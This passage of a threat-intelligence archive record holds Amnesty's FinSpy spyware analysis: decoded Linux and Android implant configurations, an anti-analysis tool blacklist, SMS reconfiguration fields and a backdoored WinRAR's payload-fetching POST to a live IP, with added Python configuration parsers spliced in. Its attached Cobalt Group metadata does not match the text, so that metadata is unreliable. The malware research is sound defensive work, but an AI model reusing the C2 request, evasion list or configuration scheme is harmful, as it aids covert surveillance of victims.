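if __name__ == '__main__':
    print(scan_profile(SAMPLE_PROFILE))
```

Because the directory and launcher name are operator-configurable, a scanner should key on the decoding construct (CS_FONT variables and the sed/dc or xxd pipeline) rather than on the literal path /home/user/.cache/.cfg recovered here.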
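The Size, Type, Value layout described for the Mac OS configuration files applies to the Linux .dat files as well. The Python below is an added example, not code from the report or its GitHub repository: it builds a small configuration blob and parses it back record by record, refusing a truncated record instead of silently skipping it. Its field widths (a 32-bit little-endian size covering the whole record, then a 32-bit little-endian type) are assumptions of the example, as is reading the low byte of the type as the data kind, chosen to match the dumps on this page where the unnamed integer fields end in 0x40 and the 0/1 flags in 0x30. The name TlvTypeConfigTargetPort is attached to a made-up code 0x800040 purely for the demonstration, and the sample blob is constructed, not extracted from a sample.

```python
import struct

# Assumed record header: size (whole record, header included) and type, both
# 32-bit little-endian, followed by size - 8 bytes of value.
HEADER = struct.Struct('<II')

# Assumed data-kind codes, taken from the low byte of the type as it appears
# in the dumps on this page: integer fields end in 0x40, 0/1 flags in 0x30.
# Anything else is returned as raw bytes.
KIND_INT = 0x40
KIND_FLAG = 0x30

# Hypothetical code for TlvTypeConfigTargetPort, used only by this example;
# unknown codes are reported in hex, as the report does.
NAMES = {0x800040: 'TlvTypeConfigTargetPort'}


def encode_record(tlv_type, value):
    # Builds one Size/Type/Value record; used here to construct the sample.
    if isinstance(value, bool):
        body = bytes([int(value)])
    elif isinstance(value, int):
        body = struct.pack('<I', value)
    else:
        body = value
    return HEADER.pack(HEADER.size + len(body), tlv_type) + body


def decode_value(tlv_type, body):
    kind = tlv_type & 0xFF
    if kind == KIND_INT and len(body) == 4:
        return struct.unpack('<I', body)[0]
    if kind == KIND_FLAG and len(body) == 1:
        return bool(body[0])
    return body


def parse_tlv(blob):
    # Walks the blob record by record. A header that does not fit, a size
    # smaller than the header, or a record running past the end of the data
    # is reported as corruption rather than skipped.
    offset = 0
    out = {}
    while offset < len(blob):
        if len(blob) - offset < HEADER.size:
            raise ValueError('truncated header at offset %d' % offset)
        size, tlv_type = HEADER.unpack_from(blob, offset)
        if size < HEADER.size or offset + size > len(blob):
            raise ValueError('bad record size %d at offset %d' % (size, offset))
        body = blob[offset + HEADER.size: offset + size]
        name = NAMES.get(tlv_type, '0x%x' % tlv_type)
        out[name] = decode_value(tlv_type, body)
        offset += size
    return out


def is_corrupt(blob):
    # True when the blob does not parse as a well-formed record sequence.
    try:
        parse_tlv(blob)
    except ValueError:
        return True
    return False


# Constructed sample configuration; the two unnamed codes and their values
# are the ones shown in the dumps on this page.
SAMPLE_BLOB = (encode_record(0x804140, 2048)
               + encode_record(0x807c30, False)
               + encode_record(0x800040, 443)
               + encode_record(0x8000a0, b'PDF'))

if __name__ == '__main__':
    print(parse_tlv(SAMPLE_BLOB))
```

Validating the size before slicing matters more than it looks: a configuration file recovered from disk is often partially overwritten, and a parser that trusts the size field will happily read garbage as the next record.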
Here\r\nis the decoded configuration for the core module:\r\n{\r\n  “TlvTypeTrojanID”: “PDF”,\r\n  “0x80ab40”: 2774182400,\r\n  “0x80aa40”: 0,\r\n  “TlvTypeEncryption”: “B-P\u0026=YwCS[DJ\\3\\u000e)^^’@@\\b3”,\r\n  “TlvTypeConfigTargetID”: “PDF”,\r\n  “TlvTypeConfigAutoRemovalIfNoProxy”: 168,\r\n  “TlvTypeTrojanMaxInfections”: 9,\r\n  “TlvTypeTargetUID”: 0,\r\n  “TlvTypeBlackListEntry”: [\r\n    {\r\n      “category”: “Monitoring”,\r\n      “list”: [\r\n        “taskmgr”,\r\n        “Windows Task Manager”,\r\n        “AccessEnum”,\r\n        “AccessEnum”,\r\n        “ADExplorer”,\r\n        “Active Directory Explorer”,\r\n        “ADInsight”,\r\n        “Insight for Active Directory”,\r\n        “Autologon”,\r\n        “Autologon”,\r\n        “autoruns”,\r\n        “Autoruns”,\r\n        “Bginfo”,\r\n        “BGInfo”,\r\n        “Cacheset”,\r\n        “Cacheset”,\r\n        “Dbgview”,\r\n        “Debug View”,\r\n        “Desktops”,\r\n        “Desktops”,\r\n        “disk2vhd”,\r\n        “Disk2vhd”,\r\n        “Diskmon”,\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 11 of 17\n\n“Disk Monitor”,\r\n        “DiskView”,\r\n        “LoadOrd”,\r\n        “LoadOrder”,\r\n        “pagedfrg”,\r\n        “System File Defragmenter”,\r\n        “procexp”,\r\n        “Process Explorer”,\r\n        “Procmon”,\r\n        “Process Monitor”,\r\n        “RootkitRevealer”,\r\n        “ShareEnum”,\r\n        “ShellRunas”,\r\n        “Tcpview”,\r\n        “TCPView”,\r\n        “vmmap”,\r\n        “VMMap”,\r\n        “Winobj”,\r\n        “ZoomIt”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “Sniffer”,\r\n      “list”: [\r\n        “wireshark”,\r\n        “The Wireshark Network Analyzer”,\r\n        “TCPDump”,\r\n        “Tcpview”,\r\n        “NetstatViewer”,\r\n        “Netstat Viewer”,\r\n        “NetPryer”,\r\n        “Ultra Network Sniffer”\r\n      ]\r\n    },\r\n    {\r\n      
“category”: “Debugger”,\r\n      “list”: [\r\n        “OllyDbg”,\r\n        “idag”,\r\n        “The interactive disassembler”,\r\n        “WinDbg”\r\n      ]\r\n    }\r\n  ],\r\n  “TlvTypeWhiteListEntry”: [\r\n    {\r\n      “category”: “Browser”,\r\n      “list”: [\r\n        “firefox”,\r\n        “Mozilla Firefox”,\r\n        “iexplore”,\r\n        “Windows Internet Explorer”,\r\n        “opera”,\r\n        “chrome”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “Messenger”,\r\n      “list”: [\r\n        “icq”,\r\n        “ICQ”,\r\n        “aim6”,\r\n        “AIM”,\r\n        “Skype”,\r\nhttps://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/\r\nPage 12 of 17\n\n“Ypager”,\r\n        “Yahoo Messenger”,\r\n        “pidgin”,\r\n        “Buddy List”,\r\n        “trillian”,\r\n        “Trillian”,\r\n        “googletalk”,\r\n        “google Talk”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “E – Mail”,\r\n      “list”: [\r\n        “OUTLOOK”,\r\n        “Microsoft Outlook”,\r\n        “msimn”,\r\n        “Outlook Express”,\r\n        “thunderbird”,\r\n        “Mozilla Thunderbird”,\r\n        “WinMail”,\r\n        “Windows Mail”,\r\n        “thebat”,\r\n        “The Bat!”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “FileSharing”,\r\n      “list”: [\r\n        “bittorrent”,\r\n        “Bit Torrent”,\r\n        “uTorrent”,\r\n        “µTorrent”,\r\n        “emule”,\r\n        “eMule”,\r\n        “edonkey2000”,\r\n        “eDonkey”,\r\n        “kazaa”,\r\n        “Kazaa”,\r\n        “FrostWire”,\r\n        “LimeWire”\r\n      ]\r\n    },\r\n    {\r\n      “category”: “VoIP”,\r\n      “list”: [\r\n        “CGStarter”,\r\n        “X-Lite”,\r\n        “Gizmo5”,\r\n        “Mercuro”,\r\n        “Mercuro IMS Client”,\r\n        “ts3client_win32”,\r\n        “TeamSpeak 3”,\r\n        “Zfone”,\r\n        “Zfone Control Panel”\r\n      ]\r\n    }\r\n  ],\r\n  “TlvTypeConfigTargetPort”: 
443,\r\n  “TlvTypeRequestID”: 0,\r\n  “0x804140”: 2048,\r\n  “TlvTypeVersion”: 0,\r\n  “TlvTypeUserID”: 1000,\r\n  “TlvTypeConfigAutoRemovalDateTime”: “0000000000000000”,\r\n  “TlvTypeTrojanUID”: 229643403,\r\n  “TlvTypeConfigTargetProxy”: [\r\n    “185.25.50.[REDACTED]”,\r\n    “103.11.67.[REDACTED]”\r\n  ],\r\n  “TlvTypeConfigFileTransferSpeed”: 1024,\r\n  “0x807c30”: 0,\r\n  “TlvTypeConfigTargetHeartbeatInterval”: 40000,\r\n  “TlvTypeConfigActiveHiding”: 0\r\n}\r\nRelated Sample\r\nAnother Linux sample (sha256: bd1b8bc046dbf19f8c9bbf9398fdbc47c777e1d9e6d9ff1787ada05ed75c1b12) was found on VirusTotal during the investigation. It was first uploaded to VirusTotal in 2014.\r\nFinSpy for Android\r\nThe file “WIFI.apk” identified on 158.69.105.207 (sha256: 854774a198db490a1ae9f06d5da5fe6a1f683bf3d7186e56776516f982d41ad3) is an Android version of the FinSpy spyware.\r\nObfuscation\r\nThe sample employs multiple layers of obfuscation:\r\nJava method names are obfuscated, with names such as iIiOi11OIOOl01O.\r\nStrings are encoded.\r\nThe control-flow graph is broken up by heavy use of threads and IPC.\r\nThe actual code is littered with dummy calls.\r\nStrings are stored as XOR’ed byte arrays, with the key passed to the decoding function as an argument. This obfuscation technique was not observed in previously publicly analyzed versions of FinSpy for Android.\r\nLocal socket address generation\r\nFinSpy for Android uses Unix sockets to communicate between threads.
The local socket address is generated by hashing the values of the following system properties:\r\nproduct.model\r\nproduct.brand\r\nproduct.name\r\nproduct.device\r\nproduct.manufacturer\r\nbuild.fingerprint\r\nA utility method used both to encode data and to generate the local socket address uses the fixed timestamp value 1540483477, which corresponds to Thu 25 October 2018 16:04:37 UTC.\r\nConfiguration\r\nAll previously publicly analyzed samples of FinSpy for Android stored the configuration within the APK file metadata. This sample instead embeds the configuration directly in the DEX file, using the same Type-Length-Value (TLV) encoding found in previous Android versions.\r\n[Figure: function locating the DEX file path from which the configuration is extracted]\r\nFollowing is the extracted configuration for this sample:\r\nTlvTypeRequestID : 0\r\nTlvTypeMobileTargetUID : 0\r\nTlvTypeVersion : 0\r\nTlvTypeMobileTargetID : WIFI\r\nTlvTypeMobileTargetHeartbeatInterval : 120\r\n0x849830 : 0\r\nTlvTypeMobileTargetPositioning : ‘\\x82\\x87\\x86\\x81\\x83’\r\n0x846b30 : 1\r\nTlvTypeConfigTargetProxy : [‘185.25.50.[REDACTED]’, ‘103.11.67.[REDACTED]’]\r\nTlvTypeConfigTargetPort : 443\r\nTlvTypeConfigSMSPhoneNumber : [REDACTED]\r\nTlvTypeMobileTrojanID : WIFI\r\nTlvTypeMobileTrojanUID : 229643516\r\nTlvTypeUserID : 1000\r\nTlvTypeTrojanMaxInfections : 9\r\nTlvTypeConfigMobileAutoRemovalDateTime : 0\r\nTlvTypeConfigAutoRemovalIfNoProxy : 168\r\nTlvTypeMobileTargetHeartbeatEvents : 173\r\nTlvTypeMobileTargetHeartbeatRestrictions : 208\r\nTlvTypeMobileTargetLocationChangedRange : 0\r\nTlvTypeInstalledModules : {‘data’:\r\n‘\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x\r\n‘logging’: False, ‘spycall’: False, ‘call_interception’: False, ‘sms’: True, 
‘address_book’: True, ‘tracking’: True,\r\n‘phone_logs’: True}\r\nTlvTypeMobileTrackingConfigRaw :\r\n‘V\\x00\\x00\\x00\\xa03E\\x00\\x0c\\x00\\x00\\x00@AE\\x00\\xe8\\x03\\x00\\x00\\x0c\\x00\\x00\\x00@@E\\x00,\\x01\\x00\\x00\\x0c\\x00\\x00\\x00@DE\\x00\\xe8\\x03\\x0\r\n0x544090 :\r\n‘\\\\x00\\x00\\x00\\xa0@T\\x00\\x0c\\x00\\x00\\x00@D\\xfe\\x00P\\x00\\x00\\x00\\t\\x00\\x00\\x000C\\xfe\\x00\\x01\\x0c\\x00\\x00\\x00@F\\xfe\\x00(\\x00\\x00\\x00\\x0c\\x0\r\n0x534090 :\r\n‘S\\x00\\x00\\x00\\xa0AS\\x00\\x0c\\x00\\x00\\x00@D\\xfe\\x00P\\x00\\x00\\x00\\t\\x00\\x00\\x000C\\xfe\\x00\\x01\\x0c\\x00\\x00\\x00@F\\xfe\\x00(\\x00\\x00\\x00\\x0c\\x0\r\n0x550190 : ‘\\x14\\x00\\x00\\x00\\xa0\\x02U\\x00\\x0c\\x00\\x00\\x00@B\\xfe\\x00\\x11+\\x00\\x00’\r\n0x562090 :\r\n‘;\\x00\\x00\\x00\\xa0!V\\x00\\t\\x00\\x00\\x000#V\\x00\\x01\\t\\x00\\x00\\x000%V\\x00\\x01\\t\\x00\\x00\\x000$V\\x00\\x01\\x0c\\x00\\x00\\x00@”V\\x00\\x00\\x00\\x00\\xf\r\n0x570190 : ‘\r\n\\x00\\x00\\x00\\xa0\\x02W\\x00\\x0c\\x00\\x00\\x00@B\\xfe\\x00\\x11+\\x00\\x00\\x0c\\x00\\x00\\x00@\\x03W\\x00\\x00\\x00\\x00\\xff’\r\nTlvTypeEncryption : b”B-P\u0026=YwCS[DJ\\3\\x0e)^^’@@\\x083″\r\nEmergency Reconfiguration\r\nFinSpy can be reconfigured via SMS, through the Java method org.xmlpush.v3.q.c.a(). When an SMS corresponding to\r\nTlvTypeMobileTargetEmergencyConfig is received, FinSpy reconfigures itself by parsing the received payload. 
The following attributes can be reconfigured:\r\nTlvTypeConfigTargetPort: port number for the C\u0026C proxy.\r\nTlvTypeConfigSMSPhoneNumber: phone number for SMS-based C\u0026C communications.\r\nTlvTypeMobileTrojanID: unknown purpose.\r\nTlvTypeMobileTrojanUID: unknown purpose.\r\nTlvTypeUserID: unknown purpose.\r\nTlvTypeTrojanMaxInfections: unknown purpose.\r\nTlvTypeConfigMobileAutoRemovalDateTime: implant self-destruction time.\r\nTlvTypeConfigAutoRemovalIfNoProxy: implant self-destructs if the C\u0026C proxy is unavailable.\r\nTlvTypeMobileTargetHeartbeatRestrictions: conditions under which callbacks are suppressed.\r\nTlvTypeMobileTargetHeartbeatEvents: events that trigger callbacks to the C\u0026C.\r\nTlvTypeMobileTargetLocationChangedRange: triggers updates based on location changes.\r\nTlvTypeInstalledModules: list of implant features and their configuration (SMS log, call log, etc.).\r\nOther parameters whose purpose is unknown can also be set.\r\nNew TLV types\r\nFinSpy stores its configuration and exchanges messages with its C\u0026C server in a custom Type-Length-Value (TLV) encoding that FinFisher developers introduced in early versions. Each record stores first its size, then an identifier for the type of the data, then the data itself, so the on-disk order is actually length, type, value. The raw dumps above show the layout concretely: both header fields are 4-byte little-endian integers, the size counts the 8-byte header as well as the data, and some records are containers whose data is itself a sequence of TLV records (the 0x550190 entry, for instance, is a 20-byte container holding one 12-byte record). This format was originally identified in a 2012 report by TrustWave.
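As an added example that is not part of the Amnesty report and is not FinFisher code, the following Python parses that layout. It reads the kind of raw byte string the dumps above print (the 0x550190 entry is used verbatim as sample input), treats the low byte of the type field as a data-type flag (container, 32-bit integer or single-byte boolean: an assumption generalised from the values visible in those dumps, not a documented FinFisher constant), and can re-serialise a tree so that a modified configuration round-trips. The symbolic names the report prints (TlvType... and the 0x...90 keys) come from the authors own symbol table, which the page does not reproduce, so this example reports raw type values instead.

```python
import struct

# One FinSpy TLV record, as seen in the raw dumps above: a 4-byte little-endian
# size that covers the whole record (8-byte header plus data), a 4-byte
# little-endian type identifier, then the data.
HEADER = struct.Struct('<II')

# Low byte of the type field. These values are an assumption generalised from
# the dumps on this page (0x...a0 entries wrap nested records, 0x...40 entries
# carry 4-byte integers, 0x...30 entries carry a single byte); they are not a
# documented FinFisher constant.
FLAG_BOOL = 0x30
FLAG_UINT32 = 0x40
FLAG_CONTAINER = 0xA0


def parse_tlv(buf, start=0, end=None):
    '''Parse the consecutive records in buf[start:end] into a list of dicts.

    Containers are parsed recursively; unknown flag bytes keep their raw data.
    A size that runs past the buffer raises ValueError instead of reading
    beyond it, which is what you want when feeding untrusted config blobs in.
    '''
    end = len(buf) if end is None else end
    records = []
    pos = start
    while pos < end:
        if end - pos < HEADER.size:
            raise ValueError(f'truncated header at offset {pos}')
        size, tlv_type = HEADER.unpack_from(buf, pos)
        if size < HEADER.size or pos + size > end:
            raise ValueError(f'bad record size {size} at offset {pos}')
        data = bytes(buf[pos + HEADER.size:pos + size])
        flag = tlv_type & 0xFF
        if flag == FLAG_CONTAINER:
            value = parse_tlv(buf, pos + HEADER.size, pos + size)
        elif flag == FLAG_UINT32 and len(data) == 4:
            value = struct.unpack('<I', data)[0]
        elif flag == FLAG_BOOL and len(data) == 1:
            value = bool(data[0])
        else:
            value = data
        records.append({'type': tlv_type, 'value': value})
        pos += size
    return records


def build_tlv(records):
    '''Inverse of parse_tlv: serialise a record list back to TLV bytes.'''
    out = bytearray()
    for rec in records:
        tlv_type, value = rec['type'], rec['value']
        flag = tlv_type & 0xFF
        if flag == FLAG_CONTAINER:
            data = build_tlv(value)
        elif flag == FLAG_UINT32:
            data = struct.pack('<I', value)
        elif flag == FLAG_BOOL:
            data = bytes([1 if value else 0])
        else:
            data = bytes(value)
        out += HEADER.pack(HEADER.size + len(data), tlv_type)
        out += data
    return bytes(out)


def dump(records, indent=0):
    '''Render a parsed tree as one text line per record, children indented.'''
    lines = []
    pad = ' ' * indent
    for rec in records:
        tlv_type, value = rec['type'], rec['value']
        if isinstance(value, list):
            lines.append(f'{pad}0x{tlv_type:08x} (container)')
            lines.extend(dump(value, indent + 2))
        elif isinstance(value, bytes):
            lines.append(f'{pad}0x{tlv_type:08x} = {value.hex()}')
        else:
            lines.append(f'{pad}0x{tlv_type:08x} = {value}')
    return lines


# The 0x550190 entry of the Android configuration dump above, as raw bytes:
# a 20-byte container holding one 12-byte uint32 record.
SAMPLE_0X550190 = bytes.fromhex('14000000a00255000c0000004042fe00112b0000')

# Constructed sample, not from the page: made-up type identifiers that reuse
# the flag bytes, wrapping a boolean and a uint32 inside one container.
CONSTRUCTED = build_tlv([
    {'type': 0x00AA01A0, 'value': [
        {'type': 0x00AA0230, 'value': True},
        {'type': 0x00AA0340, 'value': 40000},
    ]},
])


if __name__ == '__main__':
    for line in dump(parse_tlv(SAMPLE_0X550190)) + dump(parse_tlv(CONSTRUCTED)):
        print(line)
```

Running the file prints the tree for both samples (the page sample decodes to container 0x005502a0 holding 0x00fe4240 = 11025); a truncated blob raises ValueError rather than reading past the buffer, and build_tlv(parse_tlv(b)) returns b unchanged for well-formed input.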
In this latest version new TLV values are introduced, including:\r\nTimeline\r\nThe certificate used to sign this application (sha1: 7C6E4F2E84EBAA8D25040F63D840E14F6F822125) was issued in May 2017, but the APK file was created on 23 October 2019 according to the timestamp of the APK.\r\nBackdoored WinRAR: FinSpy for Windows\r\nThe last sample identified (bb8c0e477512adab1db26eb77fe10dadbc5dcbf8e94569061c7199ca4626a420, wrar571.exe) is a backdoored version of the WinRAR software.\r\nThe file is a self-extracting WinRAR archive in which the code of the function __security_check_cookie (the MSVC /GS stack-cookie check that every protected function calls on return, so the hook runs early and reliably) was patched to redirect execution to an obfuscated shellcode. The shellcode issues an HTTP POST request to fetch the final payload from the IP 207.244.95[.]223:\r\nPOST hxxp://207.244.95.223/docs/attachment.php?attachmentid=ce9de8c78b1053b5b3c1ad7887ddf53d\u0026d=\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.\r\nProxy-Connection: Keep-Alive\r\nContent-Length: 16\r\nHost: 207.244.95.223\r\nThe shellcode then decrypts the payload and runs it in memory. We could not retrieve the payload during the investigation, but we expect it to download the next stages of FinSpy for Windows.\r\nThe extracted WinRAR program 5.71 was released in April 2019. 
The backdoor was thus generated between April and September 2019.\r\nIndicators of Compromise\r\nIndicators of Compromise and scripts are available here.\r\nGet in touch\r\nIf you received any suspicious email like those we described in this report, or other forms of suspected targeted attack, you can contact us at:\r\nAcknowledgements\r\nSpecial thanks to Esther Onfroy and to Maciek Kotowicz for their contributions to this report.\r\nSource: https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/"
	],
	"report_names": [
		"german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "2dfaa730-7079-494c-b2f0-3ff8f3598a51",
			"created_at": "2022-10-25T16:07:23.474746Z",
			"updated_at": "2026-04-10T02:00:04.623746Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"ATK 67",
				"Cobalt Gang",
				"Cobalt Spider",
				"G0080",
				"Gold Kingswood",
				"Mule Libra",
				"TAG-CR3"
			],
			"source_name": "ETDA:Cobalt Group",
			"tools": [
				"ATMRipper",
				"ATMSpitter",
				"Agentemis",
				"AmmyyRAT",
				"AtNow",
				"COOLPANTS",
				"CobInt",
				"Cobalt Strike",
				"CobaltStrike",
				"Cyst Downloader",
				"Fareit",
				"FlawedAmmyy",
				"Formbook",
				"Little Pig",
				"Metasploit Stager",
				"Mimikatz",
				"More_eggs",
				"NSIS",
				"Nullsoft Scriptable Install System",
				"Pony Loader",
				"Ripper ATM",
				"SDelete",
				"Siplog",
				"SoftPerfect Network Scanner",
				"SpicyOmelette",
				"Taurus Builder",
				"Taurus Builder Kit",
				"Taurus Loader",
				"Terra Loader",
				"ThreatKit",
				"VenomKit",
				"cobeacon",
				"win.xloader"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c11abba0-f5e8-4017-a4ee-acb1a7c8c242",
			"created_at": "2022-10-25T15:50:23.744036Z",
			"updated_at": "2026-04-10T02:00:05.294413Z",
			"deleted_at": null,
			"main_name": "Cobalt Group",
			"aliases": [
				"Cobalt Group",
				"GOLD KINGSWOOD",
				"Cobalt Gang",
				"Cobalt Spider"
			],
			"source_name": "MITRE:Cobalt Group",
			"tools": [
				"Mimikatz",
				"More_eggs",
				"SpicyOmelette",
				"SDelete",
				"Cobalt Strike",
				"PsExec"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434807,
	"ts_updated_at": 1775826688,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/08f28a1c3c042b3806e0e32fe993bdc915da55b9.pdf",
		"text": "https://archive.orkl.eu/08f28a1c3c042b3806e0e32fe993bdc915da55b9.txt",
		"img": "https://archive.orkl.eu/08f28a1c3c042b3806e0e32fe993bdc915da55b9.jpg"
	}
}